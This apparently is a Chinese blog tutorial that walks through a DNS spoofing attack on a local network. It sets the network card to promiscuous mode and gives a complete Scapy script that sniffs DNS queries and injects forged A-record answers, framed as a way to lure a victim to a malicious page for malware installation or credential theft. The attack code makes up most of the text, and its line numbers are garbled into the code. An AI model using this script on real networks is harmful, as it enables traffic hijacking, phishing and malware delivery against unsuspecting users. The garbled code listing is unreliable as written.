假设在一个的局域网内有两个人:Bob和Eve。Eve想让Bob访问他创建的恶意网页,这样她就可以通过隐藏性的下载给Bob的计算机上安装恶意软件,或者可能展示一个欺骗性的站点来试图窃取Bob的认证信息。
(图片来自以上提供的链接)
(本测试环境,均为centos6.5系统环境)
一、设置attacker服务器的网卡模式为混杂模式,这样就可以捕获局域网内的所有数据包:
ifconfig em1 promisc
查看网卡模式:ifconfig em1
说明网卡已经是混杂模式
二、编写攻击代码:
打开dns_spoof.py脚本文件:
1 #!/usr/bin/env python
2 #-*- coding -*-:utf-8
3
4 from scapy.all import *
5 importtime6 importlogging7
8 logger = logging.getLogger('main')9 logging.basicConfig(format='%(levelname)s:%(message)s',level=logging.DEBUG)10 logger.setLevel(logging.DEBUG)11 #Set the interface for scapy to use
12 conf.iface = 'br0'
13 #Set the spoofed response
14 spoofed_ip = '192.168.28.118'
15
16 defsend_response(x):17 #Get the requested domain
18 req_domain =x[DNS].qd.qname19 logger.info('Found request for' +req_domain)20 #First,we delete the existing lengths and checksums..
21 #We will let Scapy re-create them
22 del(x[UDP].len)23 del(x[UDP].chksum)24 del(x[IP].len)25 del(x[IP].chksum)26 #Let`s build our response from a copy of the original packet
27 response =x.copy()28 #we need to start by changing our response to be "from-ds" ,or from the access point.
29 response.FCfield = 2L
30 #Switch the MAC addresses
31 #response.addr1,response.addr2 = x.addr2,x.addr1
32 response.src,response.dst =x.dst,x.src33 #Switch the IP addresses
34 response[IP].src,response[IP].dst =x[IP].dst,x[IP].src35 #Switch the ports
36 response.sport,response.dport =x.dport,x.sport37 #Set the DNS flags
38 response[DNS].qr = 1L
39 response[DNS].ra = 1L
40 response[DNS].ancount = 1
41 #Let`s add on the answer section
42 response[DNS].an =DNSRR(43 rrname =req_domain,44 type = 'A',45 rclass = 'IN',46 ttl = 900,47 rdata =spoofed_ip48 )49 #Now,we inject the response!
50 sendp(response)51 logger.info('Sent response:' + req_domain + '->' + spoofed_ip + '\n')52
53 defmain():54 logger.info('Starting to intercept [CTRL+C to stop]')55 sniff(prn=lambda x: send_response(x),lfilter=lambda x:x.haslayer(UDP) and x.dport == 53)56
57 if __name__ == "__main__":58 #Make it happen!
59 main()
View Code
该脚本将捕获局域网内的DNS的A记录查询
三、演示:(为了方便演示,将本地dns服务器设置为了223.5.5.5)
使用dig @223.5.5.5 www.baidu.com命令测试如下:
本文借鉴了http://jordan-wright.com/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/的方式,脚本直接使用会有问题,做了一下调整,局域网环境实验成功。
译文连接:http://www.oschina.net/translate/wireless-attacks-with-python-part-one-the-airpwn-attack
